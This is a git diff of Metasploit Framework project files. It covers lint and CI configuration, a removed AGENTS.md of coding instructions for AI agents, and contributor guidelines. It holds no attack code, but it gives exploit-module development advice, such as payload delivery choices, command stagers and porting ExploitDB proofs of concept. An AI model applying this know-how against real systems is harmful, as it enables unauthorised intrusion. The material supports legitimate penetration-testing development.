-
-Style/FloatDivision:
-  Description: 'Not a safe rule to run on Metasploit without manual verification as the right hand side may be a string'
-  Enabled: false
-
-Style/FormatString:
-  Description: 'Not a safe rule to run on Metasploit without manual verification that the format is not redefined/shadowed'
-  Enabled: false
-
 Style/Documentation:
  Enabled: true
  Description: 'Most Metasploit modules do not have class documentation.'
  Exclude:
    - 'modules/**/*'
-    - 'test/modules/**/*'
-    - 'spec/file_fixtures/modules/**/*'

-Layout/FirstArgumentIndentation:
-  Enabled: true
-  EnforcedStyle: consistent
-  Description: 'Useful for the module hash to be indented consistently'
-
-Layout/ArgumentAlignment:
-  Enabled: true
-  EnforcedStyle: with_first_argument
-  Description: 'Useful for the module hash to be indented consistently'
-
-Layout/FirstHashElementIndentation:
-  Enabled: true
-  EnforcedStyle: consistent
-  Description: 'Useful for the module hash to be indented consistently'
-
-Layout/FirstHashElementLineBreak:
-  Enabled: true
-  Description: 'Enforce consistency by breaking hash elements on to new lines'
-
-Layout/SpaceInsideArrayLiteralBrackets:
+Layout/IndentHeredoc:
  Enabled: false
-  Description: 'Almost all module metadata have space in brackets'
+  Description: 'We need to leave this disabled for Ruby 2.2 compat, remove in 2018'

 Style/GuardClause:
  Enabled: false
  Description: 'This often introduces bugs in tested code'

-Style/EmptyLiteral:
-  Enabled: false
-  Description: 'This looks awkward when you mix empty and non-empty literals'
-
 Style/NegatedIf:
  Enabled: false
  Description: 'This often introduces bugs in tested code'
@@ -357,342 +60,65 @@ Style/ConditionalAssignment:
  Description: 'This is confusing for folks coming from other languages'

 Style/Encoding:
-  Description: 'We prefer binary to UTF-8.'
-  Enabled: false
-
-Style/ParenthesesAroundCondition:
-  Enabled: false
-  Description: 'This is used in too many places to discount, especially in ported code. Has little effect'
-
-Style/StringConcatenation:
-  Enabled: false
-  Description: >-
-    Disabled for now as it changes escape sequences when auto corrected:
-      https://github.com/rubocop/rubocop/issues/9543
-
-    Additionally seems to break with multiline string concatenation with trailing comments, example:
-      payload = "\x12" + # Size
-                "\x34" + # eip
-                "\x56"   # etc
-    With `rubocop -A` this will become:
-      payload = "\u00124V"    # etc
-
-Style/TrailingCommaInArrayLiteral:
-  Enabled: false
-  Description: 'This is often a useful pattern, and is actually required by other languages. It does not hurt.'
-
-Layout/LineLength:
-  Description: >-
-    Metasploit modules often pattern match against very
-    long strings when identifying targets.
-  Enabled: false
-
-Metrics/BlockLength:
  Enabled: true
+  Description: 'We prefer binary to UTF-8.'
+  EnforcedStyle: 'when_needed'
+
+Metrics/LineLength:
  Description: >-
-    While the style guide suggests 10 lines, exploit definitions
-    often exceed 200 lines.
-  Max: 300
+                  Metasploit modules often pattern match against very
+                  long strings when identifying targets.
+  Enabled: true
+  Max: 180

 Metrics/MethodLength:
  Enabled: true
  Description: >-
-    While the style guide suggests 10 lines, exploit definitions
-    often exceed 200 lines.
+                  While the style guide suggests 10 lines, exploit definitions
+                  often exceed 200 lines.
  Max: 300

-Naming/MethodParameterName:
-  Enabled: true
-  Description: 'Whoever made this requirement never looked at crypto methods, IV'
-  MinNameLength: 2
-
-Naming/PredicateName:
-  Enabled: true
-  # Current methods that break the rule, so that we don't add additional methods that break the convention
-  AllowedMethods:
-    - has_additional_info?
-    - has_advanced_options?
-    - has_auth
-    - has_auto_target?
-    - has_bad_activex?
-    - has_badchars?
-    - has_chars?
-    - has_check?
-    - has_command?
-    - has_content_type_extension?
-    - has_datastore_cred?
-    - has_evasion_options?
-    - has_fatal_errors?
-    - has_fields
-    - has_files?
-    - has_flag?
-    - has_function_name?
-    - has_gcc?
-    - has_h2_headings
-    - has_input_name?
-    - has_j_security_check?
-    - has_key?
-    - has_match?
-    - has_module
-    - has_object_ref
-    - has_objects_list
-    - has_options?
-    - has_page?
-    - has_passphrase?
-    - has_pid?
-    - has_pkt_line_data?
-    - has_prereqs?
-    - has_privacy_waiver?
-    - has_privates?
-    - has_protected_mode_prompt?
-    - has_proxy?
-    - has_read_data?
-    - has_ref?
-    - has_required_args
-    - has_required_module_options?
-    - has_requirements
-    - has_rop?
-    - has_s_flag?
-    - has_service_cred?
-    - has_subscriber?
-    - has_subtree?
-    - has_text
-    - has_tlv?
-    - has_u_flag?
-    - has_users?
-    - has_vuln?
-    - has_waiver?
-    - have_auth_error?
-    - have_powershell?
-    - is_accessible?
-    - is_admin?
-    - is_alive?
-    - is_alpha_web_server?
-    - is_android?
-    - is_app_binom3?
-    - is_app_carlogavazzi?
-    - is_app_cnpilot?
-    - is_app_epaduo?
-    - is_app_epmp1000?
-    - is_app_infovista?
-    - is_app_ironport?
-    - is_app_metweblog?
-    - is_app_oilom?
-    - is_app_openmind?
-    - is_app_popad?
-    - is_app_radware?
-    - is_app_rfreader?
-    - is_app_sentry?
-    - is_app_sevone?
-    - is_app_splunk?
-    - is_app_ssl_vpn?
-    - is_array_type?
-    - is_auth_required?
-    - is_author_blacklisted?
-    - is_badchar
-    - is_base64?
-    - is_bind?
-    - is_cached_size_accurate?
-    - is_cgi_enabled?
-    - is_cgi_exploitable?
-    - is_check_interesting?
-    - is_child_of?
-    - is_clr_enabled
-    - is_connect?
-    - is_dlink?
-    - is_dn?
-    - is_dynamic?
-    - is_error_code
-    - is_exception?
-    - is_exploit_module?
-    - is_exploitable?
-    - is_fqdn?
-    - is_glob?
-    - is_groupwise?
-    - is_guest_mode_enabled?
-    - is_hash_from_empty_pwd?
-    - is_high_integrity?
-    - is_hostname?
-    - is_ie?
-    - is_imc?
-    - is_imc_som?
-    - is_in_admin_group?
-    - is_interface?
-    - is_ip_targeted?
-    - is_key_wanted?
-    - is_leaf?
-    - is_local?
-    - is_logged_in?
-    - is_loggedin
-    - is_loopback_address?
-    - is_mac?
-    - is_match
-    - is_md5_format?
-    - is_module_arch?
-    - is_module_platform?
-    - is_module_wanted?
-    - is_multi_platform_exploit?
-    - is_not_null?
-    - is_null_pointer
-    - is_null_pointer?
-    - is_num?
-    - is_num_type?
-    - is_numeric
-    - is_online?
-    - is_parseable
-    - is_pass_ntlm_hash?
-    - is_passwd_method?
-    - is_password_required?
-    - is_payload_compatible?
-    - is_payload_platform_compatible?
-    - is_pointer_type?
-    - is_pri_key?
-    - is_proficy?
-    - is_rdp_up
-    - is_remote_exploit?
-    - is_resource_taken?
-    - is_rf?
-    - is_rmi?
-    - is_root?
-    - is_routable?
-    - is_running?
-    - is_scan_complete
-    - is_secure_admin_disabled?
-    - is_session_type?
-    - is_signature_correct?
-    - is_single_object?
-    - is_struct_type?
-    - is_supermicro?
-    - is_superuser?
-    - is_sws?
-    - is_system?
-    - is_system_user?
-    - is_target?
-    - is_target_suitable?
-    - is_trial_enabled?
-    - is_trustworthy
-    - is_uac_enabled?
-    - is_url_alive
-    - is_usable?
-    - is_uuid?
-    - is_valid?
-    - is_valid_bus?
-    - is_valid_snmp_value
-    - is_value_wanted?
-    - is_version_compat?
-    - is_version_tested?
-    - is_vmware?
-    - is_vul
-    - is_vulnerable?
-    - is_warbird?
-    - is_windows?
-    - is_writable
-    - is_writable?
-    - is_x86?
-    - is_zigbee_hwbridge_session?
+# Basically everything in metasploit needs binary encoding, not UTF-8.
+# Disable this here and enforce it through msftidy
+Style/Encoding:
+  Enabled: false

 # %q() is super useful for long strings split over multiple lines and
 # is very common in module constructors for things like descriptions
-Style/RedundantPercentQ:
+Style/UnneededPercentQ:
  Enabled: false

 Style/NumericLiterals:
  Enabled: false
  Description: 'This often hurts readability for exploit-ish code.'

-Layout/FirstArrayElementLineBreak:
+Layout/AlignParameters:
  Enabled: true
-  Description: 'This cop checks for a line break before the first element in a multi-line array.'
+  EnforcedStyle: 'with_fixed_indentation'
+  Description: 'initialize method of every module has fixed indentation for Name, Description, etc'

-Layout/FirstArrayElementIndentation:
-  Enabled: true
-  EnforcedStyle: consistent
-  Description: 'Useful to force values within the register_options array to have sane indentation'
-
-Layout/EmptyLinesAroundClassBody:
+Style/StringLiterals:
  Enabled: false
-  Description: 'these are used to increase readability'
-
-Layout/EmptyLinesAroundMethodBody:
-  Enabled: true
-
-Layout/ExtraSpacingWithBinDataIgnored:
-  Description: 'Do not use unnecessary spacing.'
-  Enabled: true
-  # When true, allows most uses of extra spacing if the intent is to align
-  # things with the previous or next line, not counting empty lines or comment
-  # lines.
-  AllowForAlignment: false
-  # When true, allows things like 'obj.meth(arg)  # comment',
-  # rather than insisting on 'obj.meth(arg) # comment'.
-  # If done for alignment, either this OR AllowForAlignment will allow it.
-  AllowBeforeTrailingComments: true
-  # When true, forces the alignment of `=` in assignments on consecutive lines.
-  ForceEqualSignAlignment: false
-
-Style/For:
-  Enabled: false
-  Description: 'if a module is written with a for loop, it cannot always be logically replaced with each'
+  Description: 'Single vs double quote fights are largely unproductive.'

 Style/WordArray:
  Enabled: false
  Description: 'Metasploit prefers consistent use of []'

-Style/IfUnlessModifier:
-  Enabled: false
-  Description: 'This style might save a couple of lines, but often makes code less clear'
-
-Style/PercentLiteralDelimiters:
-  Description: 'Use `%`-literal delimiters consistently.'
-  Enabled: true
-  # Specify the default preferred delimiter for all types with the 'default' key
-  # Override individual delimiters (even with default specified) by specifying
-  # an individual key
-  PreferredDelimiters:
-    default: ()
-    '%i': '[]'
-    '%I': '[]'
-    '%r': '{}'
-    '%w': '[]'
-    '%W': '[]'
-    '%q': '{}' # Chosen for module descriptions as () are frequently used characters, whilst {} are rarely used
-  VersionChanged: '0.48.1'
-
 Style/RedundantBegin:
-  Enabled: true
+  Exclude:
+    # this pattern is very common and somewhat unavoidable
+    # def run_host(ip)
+    #   begin
+    #     ...
+    #   rescue ...
+    #     ...
+    #   ensure
+    #     disconnect
+    #   end
+    # end
+    - 'modules/**/*'

-Style/SafeNavigation:
-  Description: >-
-    This cop transforms usages of a method call safeguarded by
-    a check for the existence of the object to
-    safe navigation (`&.`).
-
-    This has been disabled as in some scenarios it produced invalid code, and disobeyed the 'AllowedMethods'
-    configuration.
-  Enabled: false
-
-Style/UnpackFirst:
-  Description: >-
-    Disabling to make it easier to copy/paste `unpack('h*')` expressions from code
-    into a debugging REPL.
-  Enabled: false
-
-Lint/DetectMetadataTrailingLeadingWhitespace:
-  Enabled: true
-
-Lint/DetectOutdatedCmdExecApi:
-  Description: >-
-    Detects outdated usage of cmd_exec with separate arguments.
-    Use `create_process(executable, args: [], time_out: 15, opts: {})` API with an args array instead.
-  Enabled: true
-
-Lint/BareCheckCodeInNonExploit:
-  Description: >-
-    Use Exploit::CheckCode instead of bare CheckCode in non-exploit modules.
-    Bare CheckCode will raise a NameError at runtime in auxiliary, post, and evasion modules
-    because CheckCode is defined inside Msf::Exploit which is not in their ancestor chain.
-  Enabled: true
-  Include:
-    - 'modules/auxiliary/**/*'
-    - 'modules/post/**/*'
-    - 'modules/evasion/**/*'
+Documentation:
+  Exclude:
+    - 'modules/**/*'
@@ -1 +1 @@
-3.3.8
+2.4.3
@@ -1,9 +0,0 @@
-version: v1.25.0
-ignore: {}
-patch: {}
-exclude:
-  global:
-    # exclude unit tests which contain hard coded passwords and encrypting keys for testing purposes.
-    - spec/
-    # exclude the source code to local exploits and utilities which have to be written in a particular way to exploit the vulnerabilities that we're targeting.
-    - external/source/
@@ -1,28 +0,0 @@
---
-include:
- "**/*.rb"
-exclude:
- spec/**/*
- test/**/*
- vendor/**/*
- ".bundle/**/*"
- modules/**/*
- data/**/*
- db/**/*
- external/**/*
- plugins/**/*
- scripts/**/* # Some of this is old and may not need indexing???
-require: []
-domains: []
-reporters:
- rubocop
- require_not_found
-formatter:
-  rubocop:
-    cops: safe
-    except: []
-    only: []
-    extra_args: []
-require_paths: []
-plugins: []
-max_files: 0
@@ -0,0 +1,67 @@
+dist: trusty
+sudo: false
+group: stable
+bundler_args: --without coverage development pcap
+cache: bundler
+addons:
+  postgresql: '9.6'
+  apt:
+    packages:
+      - libpcap-dev
+      - graphviz
+language: ruby
+rvm:
+  - '2.2'
+  - '2.3.6'
+  - '2.4.3'
+
+env:
+  - CMD='bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag content"'
+  - CMD='bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag ~content"'
+
+matrix:
+  fast_finish: true
+
+jobs:
+  # build docker image
+  include:
+  - env: CMD="docker-compose build" DOCKER="true"
+    # we do not need any setup
+    before_install: skip
+    install: skip
+    before_script: skip
+before_install:
+  - "echo 'gem: --no-ri --no-rdoc' > ~/.gemrc"
+  - rake --version
+  # Fail build if msftidy is not successful
+  - ln -sf ../../tools/dev/pre-commit-hook.rb ./.git/hooks/post-merge
+  - ls -la ./.git/hooks
+  - ./.git/hooks/post-merge
+  # Update the bundler
+  - gem install bundler
+before_script:
+  - cp config/database.yml.travis config/database.yml
+  - bundle exec rake --version
+  - bundle exec rake db:create
+  - bundle exec rake db:migrate
+  # fail build if db/schema.rb update is not committed
+  - git diff --exit-code db/schema.rb
+script:
+  - echo "${CMD}"
+    # we need travis_wait because the Docker build job can take longer than 10 minutes
+  - if [[ "${DOCKER}" == "true" ]]; then echo "Starting Docker build job"; travis_wait 40 "${CMD}"; else bash -c "${CMD}"; fi
+
+notifications:
+  irc: "irc.freenode.org#msfnotify"
+
+git:
+  depth: 5
+
+# Blacklist certain branches from triggering travis builds
+branches:
+  except:
+    - gh-pages
+    - metakitty
+
+services:
+  - docker
@@ -1,122 +0,0 @@
-# AI Agent Instructions for Metasploit Framework
-
-## Project Overview
-
-Metasploit Framework is an open-source penetration testing and exploitation framework written in Ruby. It provides infrastructure for developing, testing, and executing exploit code against remote targets.
-
-## Project Structure
-
- `modules/` — Metasploit modules (exploits, auxiliary, post, payloads, encoders, evasion, nops)
- `lib/msf/` — Core framework library code
- `lib/rex/` — Rex (Ruby Exploitation) library
- `lib/metasploit/` — Metasploit namespace libraries
- `data/` — Data files used by modules (wordlists, templates, binaries)
- `spec/` — RSpec test suite
- `tools/` — Developer and operational tools
- `plugins/` — msfconsole plugins
- `scripts/` — Example automation scripts
-
-## Coding Conventions
-
- Ruby (see `.ruby-version` for the current version). Minimum supported: 3.1+
- Follow the project's `.rubocop.yml` configuration — run `rubocop` on changed files before submitting
- Run `ruby tools/dev/msftidy.rb <module_file_path>` to catch common module issues
- Add `# frozen_string_literal: true` to new files (the RuboCop cop is disabled project-wide for legacy code, but new files should include it)
- No enforced line length limit, but keep code readable
- Use `%q{}` for long multi-line strings (curly braces preferred for module descriptions)
- Multiline block comments are acceptable for embedded code snippets/payloads
- Don't use `get_`/`set_` prefixes for accessor methods in new code
- Method parameter names must be at least 2 characters (exception for well-known crypto abbreviations)
-
-### Module Development
-
- Prefer writing modules in Ruby. Go and Python modules are accepted, but their external runtimes don't support the full framework API (e.g. network pivoting). Ruby modules do not have this limitation
- Prefer using hash over an array for return values, and use kwargs for reusable APIs for future extensions
- Before writing a new module, check that there is not an existing module or open pull request that already covers the same functionality
- Each module should be in its own file under the appropriate `modules/` subdirectory. In some scenarios adding module actions or targets is preferred.
- Exploits require a `DisclosureDate` field
- Exploits, auxiliary, and post modules require `Notes` with `SideEffects`
- Use the module mixin APIs — don't reinvent the wheel
- Use `create_process(executable, args: [], time_out: 15, opts: {})` instead of the deprecated `cmd_exec` with separate arguments
- License new code with `MSF_LICENSE` (the project default, defined in `lib/msf/core/constants.rb`)
- When overriding `cleanup`, always call `super` to ensure the parent mixin chain cleans up connections and sessions properly
- When possible don't set a default payload (`DefaultOptions` with `'PAYLOAD'`) in modules — let the framework choose the most appropriate payload automatically
- New modules require an associated markdown file in the `documentation/modules` folder with the same structure, including steps to set up the vulnerable environment for testing
- Module descriptions or documentation should list the range of vulnerable versions and the fixed version of the affected software, when known
- `report_service` method called when a service can be reported
- `report_vuln` method called when a vuln can be reported
- When creating a fake account / username use FAKER not `rand_test_alphanumeric`
- Always use `res.get_json_document` to convert an HTTP response to a hash instead of calling `JSON.parse(res.body)`
- If there's only one `ACTION` in the exploit, it can likely be omitted.
- `Msf::Exploit::SQLi` should be used if it's exploiting an SQLi
- All `print_*` calls should start with a capital
- when opening a file, make sure the file exists first
- when checking for a string in a response - will it always be in english?
- Ensure hardcoded strings being regex'ed will be consistent across multiple versions
- Use the TEST-NET-1 range for example / non-routeable IP addresses in unit tests and spec files: `192.0.2.0`. Local/private IPs are fine in module documentation scenarios.
- Use fetch payload instead of command stagers when only options that request the stage are available (i.e. don’t use a cmd stager and only allow curl/wget).
- Define bad characters instead of explicitly base-64 encoding payloads
- Use `ARCH_CMD` payloads instead of command stagers when only curl/wget and other download mechanisms would be available
- Don’t check the number of sessions at the end of an exploit and report success based on that, not all payloads open sessions
- Don’t submit any kind of opaque binary blob, everything must include source code and build instructions
- Don’t print host information like `#{ip}:#{port}` because it doesn’t handle IPv6 addresses, instead use `#{Rex::Socket.to_authority(ip, port)}`
- Implement a `check` method when possible to allow users to verify vulnerability before exploitation
-
-### Check Methods
-
- `check` methods must only return `CheckCode` values (e.g. `CheckCode::Vulnerable`, `CheckCode::Safe`) — never raise exceptions or call `fail_with`
- When writing a `check` method, verify it does not produce false positives when run against unrelated software or services
- Prefer using `Rex::Version` for version checks
- Use `fail_with(Failure::UnexpectedReply, '...')` (and other `Failure::*` constants) to bail out of `exploit`/`run` methods — don't use `raise` or bare `return` for error conditions
- `get_version` methods should return a REX version
- `CheckCode::Vulnerable` is only used when the vulnerability has been exploited
- `CheckCode::Appears`  is only used when the application's versions has been checked`
- Use specific regular expressions or `res.get_html_document` for version extraction with CSS selectors. Don't use a generic selectors like `href .*` dot star to grab the version, be more precise.
- Do catch exceptions that may be raised and ensure a valid Check Code is returned
- Do research and determine a minimum version where the application is vulnerable, mark prior versions as safe
- Check helper methods that are used by both `#check` and `#exploit` (or `#run`) and make sure there is no condition (exception, return, etc) where `#check` could return something else than CheckCode.
- Prefer `prepend Msf::Exploit::Remote::AutoCheck` over manually calling `check` inside `exploit` — this lets the framework handle check-before-exploit automatically
-
-### Library Code
-
- When adding complex binary or protocol parsing (e.g. BinData, RASN1, Rex::Struct2), include a code comment linking to the specification or RFC that defines the format being implemented
- Write RSpec tests for any library changes
- Follow [Better Specs](http://www.betterspecs.org/) conventions
- Write YARD documentation for public methods
- Keep PRs focused — small fixes are easier to review
- Any new hash cracking implementations require adding a test hash to `tools/dev/hash_cracker_validator.rb` and ensuring that passes without error
-
-### Testing
-
- Tests live in `spec/` mirroring the `lib/` structure
- Run tests with: `bundle exec rspec spec/path/to/spec.rb`
-
-### Preferred Libraries
-
- Use the `RubySMB` library for SMB modules
- Use `Rex::Stopwatch.elapsed_time` to track elapsed time
- Use the `Rex::MIME::Message` class for MIME messages instead of hardcoding XML
- When creating random variable names prefer `Rex::RandomIdentifier::Generator` and specify the runtime language used. This avoids generating langauge keywords that would break the script.
-
-## Common Patterns
-
- Register options with `register_options` and `register_advanced_options`
- Use `SCREAMING_SNAKE_CASE` option names and `CamelCase` advanced option names
- Use `datastore['OPTION_NAME']` to access module options
- Use `print_status`, `print_good`, `print_error`, `print_warning` for console output
- Use `vprint_*` variants for verbose-only output
- Use `send_request_cgi` for HTTP requests in modules
- Use `connect` / `disconnect` for TCP socket operations
-
-## Before Submitting
-
- Ensure `rubocop` and `msftidy` pass on any changed files with no new offenses
- Ensure `ruby tools/dev/msftidy_docs.rb <documentation_file>` passes on any changed documentation markdown docs with no new offenses
-
-## What NOT to Do
-
- Don't submit untested code — all code must be manually verified
- Don't include sensitive information (IPs, credentials, API keys, hashes of credentials) in code or docs
- Don't include more than one module per pull request
- Don't add new scripts to `scripts/` — use post modules instead
- Don't use `pack`/`unpack` with invalid directives (enforced by linter)
@@ -36,8 +36,8 @@ when an individual is representing the project or its community.

 Instances of abusive, harassing, or otherwise unacceptable behavior may be
 reported by contacting the project maintainers at msfdev@metasploit.com. If
-the incident involves a committer, you may report it directly to
-smcintyre@metasploit.com or jacquelyn_harris@rapid7.com.
+the incident involves a committer, you may report directly to
+egypt@metasploit.com or todb@metasploit.com.

 All complaints will be reviewed and investigated and will result in a
 response that is deemed necessary and appropriate to the circumstances.
@@ -1,120 +1,122 @@
+# Hello, World!
+
+Thanks for your interest in making Metasploit -- and therefore, the
+world -- a better place!
+
+Are you about to report a bug? Sorry to hear it. Here's our [Issue tracker].
+Please try to be as specific as you can about your problem; include steps
+to reproduce (cut and paste from your console output if it's helpful) and
+what you were expecting to happen.
+
+Are you about to report a security vulnerability in Metasploit itself?
+How ironic! Please take a look at Rapid7's [Vulnerability
+Disclosure Policy](https://www.rapid7.com/disclosure.jsp), and send
+your report to security@rapid7.com using our [PGP key].
+
+Are you about to contribute some new functionality, a bug fix, or a new
+Metasploit module? If so, read on...
+
 # Contributing to Metasploit
-Thank you for your interest in making Metasploit -- and therefore, the
-world -- a better place!  Before you get started, please review our [Code of Conduct](./CODE_OF_CONDUCT.md). This helps us ensure our community is positive and supportive for everyone involved.

-## Code Free Contributions
-Before we get into the details of contributing code, you should know there are multiple ways you can add to Metasploit without any coding experience:
+What you see here in CONTRIBUTING.md is a bullet point list of the do's
+and don'ts of how to make sure *your* valuable contributions actually
+make it into Metasploit's master branch.

- - You can [submit bugs and feature requests](https://github.com/rapid7/metasploit-framework/issues/new/choose) with detailed information about your issue or idea:
- 	- If you'd like to propose a feature, describe what you'd like to see. Mock ups of console views would be great.
- 	- If you're reporting a bug, please be sure to include the expected behaviour, the observed behaviour, and steps to reproduce the problem. Resource scripts, console copy-pastes, and any background on the environment you encountered the bug in would be appreciated. More information can be found [below](#bug-reports).
- - [Help fellow users with open issues](https://github.com/rapid7/metasploit-framework/issues). This can require technical knowledge, but you can also get involved in conversations about bug reports and feature requests. This is a great way to get involved without getting too overwhelmed!
- - [Help fellow committers test recently submitted pull requests](https://github.com/rapid7/metasploit-framework/pulls). Again this can require some technical skill, but by pulling down a pull request and testing it, you can help ensure our new code contributions for stability and quality.
- - [Report a security vulnerability in Metasploit itself] to Rapid7. If you see something you think makes Metasploit vulnerable to an attack, let us know!
- - Add [module documentation]. New documentation is always needed and cleaning up existing documents is just as important! If you're a non-native English speaker, you can help by replacing any ambiguous idioms, metaphors, or unclear language that might make our documentation hard to understand.
+If you care not to follow these rules, your contribution **will** be
+closed. Sorry!

+This is intended to be a **short** list. The [wiki] is much more
+exhaustive and reveals many mysteries. If you read nothing else, take a
+look at the standard [development environment setup] guide
+and Metasploit's [Common Coding Mistakes].

 ## Code Contributions
-For those of you who are looking to add code to Metasploit, your first step is to set up a [development environment]. For a detailed reference of our coding conventions, project structure, and preferred patterns, see [AGENTS.md](./AGENTS.md). Once that's done, we recommend beginners start by adding a [proof-of-concept exploit from ExploitDB,](https://www.exploit-db.com/search?verified=true&hasapp=true&nomsf=true) as a new module to the Metasploit framework. These exploits have been verified as recreatable and their ExploitDB page includes a copy of the exploitable software. This makes testing your module locally much simpler, and most importantly the exploits don't have an existing Metasploit implementation. ExploitDB can be slow to update however, so please double check that there isn't an existing module before beginning development! If you're certain the exploit you've chosen isn't already in Metasploit, read our [writing an exploit guide](https://docs.metasploit.com/docs/development/developing-modules/guides/get-started-writing-an-exploit.html). It will help you to get started and avoid some common mistakes.

-Once you have finished your new module and tested it locally to ensure it's working as expected, check out our [guide for accepting modules](https://docs.metasploit.com/docs/development/maintainers/process/guidelines-for-accepting-modules-and-enhancements.html#module-additions). This will give you a good idea of how to clean up your code so that it's likely to get accepted.
-
-Finally, follow our short list of do's and don'ts below to make sure your valuable contributions actually make it into Metasploit's master branch! We try to consider all our pull requests fairly and in detail, but if you do not follow these rules, your contribution
-will be closed. We need to ensure the code we're adding to master is written to a high standard.
-
-## Expedited Module Creation Process
-We strive to respect the community that has given us so much, so in the odd situation where we get multiple submissions for the same vulnerability, generally we will work with the first person who assigns themselves to the issue or the first person that submits a good-faith PR.  A good-faith PR might not even work, but it will show that the author is working their way toward a solution.  Despite this general rule, there are rare circumstances where we may ask a contributor to step aside or allow a committer to take the lead on the creation of a new module if a complete and working module with documents has not already been submitted.  This kind of expedited module creation process comes up infrequently, and usually it involves high-profile or high priority modules that we have marked internally as time-critical: think KEV list, active exploitation campaigns, CISA announcements, etc.  In those cases, we may ask a contributor that is assigned to the issue or who has submitted an incomplete module to allow a committer to take over an issue or a module PR in the interest of getting a module out quickly.  If a contributor has submitted an incomplete module, they will remain as a co-author of the module and we may build directly onto the PR they submitted, leaving the original commits in the tree.  We sincerely hope that the original author will remain involved in this expedited module creation process.  We would appreciate testing, critiquing, and any assistance that can be offered.  If the module is complete but requires minor changes, we may ask the contributor to allow us to take over testing/verification and make these minor changes without asking so we can land the module as quickly as possible.  In these cases of minor code changes, the authorship of the module will remain unchanged.  We hope everyone involved in this expedited module creation process continues to feel valued and appreciated.
-
-## Vibecoding, AI, and LLM
-My first job had a token ring LAN and I still own a Win98SE CD, so I'm not entirely sure what _vibecoding_ is, but we're cool with any coding technique you use to create a PR as long as it is tested, documented, and does what it says it does.  Untested code is incomplete code, and incomplete code should be marked as a draft PR or WIP (Work in Progress) until it is complete, tested, and ready for a committer to review.  We have had several submissions clearly from AI that were well-formatted, looked really neat, and did nothing it said it did.  While we have no problem with AI-assisted coding, please do not assume that the code generated by an AI or LLM is logically or even syntactically correct.
-
-### Code Contribution Do's & Don'ts:
-Keeping the following in mind gives your contribution the best chance of landing!
-
-#### <u>Pull Requests</u>
-**Pull request [PR#9966] is a good example to follow.**
-
-* **Do** create a [topic branch] to work on instead of working directly on `master`. This helps to:
-	*  Protect the process.
-	* Ensures users are aware of commits on the branch being considered for merge.
-	* Allows for a location for more commits to be offered without mingling with other contributor changes.
-	* Allows contributors to make progress while a PR is still being reviewed.
+* **Do** stick to the [Ruby style guide].
+* **Do** get [Rubocop] relatively quiet against the code you are adding or modifying.
 * **Do** follow the [50/72 rule] for Git commit messages.
-* **Do** write "WIP" on your PR and/or open a [draft PR] if submitting **working** yet unfinished code.
-* **Do** target your pull request to the **master branch**.
-* **Do** specify a descriptive title to make searching for your pull request easier.
-* **Do** include [console output], especially for effects that can be witnessed in the  `msfconsole`.
-* **Do** test your code and submit the test output in your PR with any sensitive information removed.
-* **Do** list [verification steps] so committers can test your code.
-* **Do** [reference associated issues] in your pull request description.
-* **Don't** leave your pull request description blank.
-* **Don't** include sensitive information in your PR (including externally-routable IP addresses in documentation).
-* **Don't** PR untested/unvalidated code you copy/pasted from the internet.
-* **Don't** PR untested/unvalidated code you copy/pasted from AI or LLM.
-* **Don't** abandon your pull request. Being responsive helps us land your code faster.
-* **Don't** post questions in older closed PRs.
-
-#### <u>New Modules</u>
-* **Do** check the issue tracker to see if there is a `suggestion-module` issue for the module you want to write, and assign yourself to it if there is.
+* **Don't** use the default merge messages when merging from other branches.
+* **Do** create a [topic branch] to work on instead of working directly on `master`.
 * **Do** license your code as BSD 3-clause, BSD 2-clause, or MIT.
-* **Do** stick to the [Ruby style guide] and use [Rubocop] to find common style issues.
-* **Do** set up `msftidy` to fix any errors or warnings that come up as a [pre-commit hook].
-* **Do** use the many module mixin [API]s.
-* **Do** include instructions on how to setup the vulnerable environment or software.
-* **Do** include [Module Documentation] showing sample run-throughs.
-* **Do** ask cve@rapid7.com for a CVE ID if this describes a new vulnerability (remember to mention your PR number!)
-* **Don't** include more than one module per pull request.
-* **Don't** submit new [scripts].  Scripts are shipped as examples for automating local tasks, and anything "serious" can be done with post modules and local exploits.

-#### <u>Library Code</u>
-* **Do** write [RSpec] tests - even the smallest change in a library can break existing code.
+### Pull Requests
+
+* **Do** target your pull request to the **master branch**. Not staging, not develop, not release.
+* **Do** specify a descriptive title to make searching for your pull request easier.
+* **Do** include [console output], especially for witnessable effects in `msfconsole`.
+* **Do** list [verification steps] so your code is testable.
+* **Do** [reference associated issues] in your pull request description.
+* **Do** write [release notes] once a pull request is landed.
+* **Don't** leave your pull request description blank.
+* **Don't** abandon your pull request. Being responsive helps us land your code faster.
+
+Pull requests [PR#2940] and [PR#3043] are a couple good examples to follow.
+
+#### New Modules
+
+* **Do** run `tools/dev/msftidy.rb` against your module and fix any errors or warnings that come up.
+  - It would be even better to set up `msftidy.rb` as a [pre-commit hook].
+* **Do** use the many module mixin [API]s. Wheel improvements are welcome; wheel reinventions, not so much.
+* **Don't** include more than one module per pull request.
+* **Do** include instructions on how to setup the vulnerable environment or software.
+* **Do** include [Module Documentation](https://github.com/rapid7/metasploit-framework/wiki/Generating-Module-Documentation) showing sample run-throughs.
+
+
+
+#### Scripts
+
+* **Don't** submit new [scripts].  Scripts are shipped as examples for
+  automating local tasks, and anything "serious" can be done with post
+  modules and local exploits.
+
+#### Library Code
+
+* **Do** write [RSpec] tests - even the smallest change in library land can thoroughly screw things up.
 * **Do** follow [Better Specs] - it's like the style guide for specs.
 * **Do** write [YARD] documentation - this makes it easier for people to use your code.
 * **Don't** fix a lot of things in one pull request. Small fixes are easier to validate.

-#### <u>Bug Fixes</u>
+#### Bug Fixes
+
 * **Do** include reproduction steps in the form of verification steps.
-* **Do** link to any corresponding [Issues] in the format of `See #1234` in your commit description.
+* **Do** include a link to any corresponding [Issues] in the format of
+  `See #1234` in your commit description.

 ## Bug Reports

-Please report vulnerabilities in Rapid7 software directly to security@rapid7.com. For more on our disclosure policy and Rapid7's approach to coordinated disclosure, [head over here](https://www.rapid7.com/security).
-
-When reporting Metasploit issues:
+* **Do** report vulnerabilities in Rapid7 software directly to security@rapid7.com.
 * **Do** write a detailed description of your bug and use a descriptive title.
-* **Do** include reproduction steps, stack traces, and anything that might help us fix your bug.
+* **Do** include reproduction steps, stack traces, and anything else that might help us verify and fix your bug.
 * **Don't** file duplicate reports; search for your bug before filing a new report.
-* **Don't** attempt to report issues on a closed PR.

-If you need some more guidance, talk to the main body of open source contributors over on our
-[GitHub Discussions](https://github.com/rapid7/metasploit-framework/discussions) or [Metasploit Slack]
+If you need some more guidance, talk to the main body of open
+source contributors over on the [Freenode IRC channel],
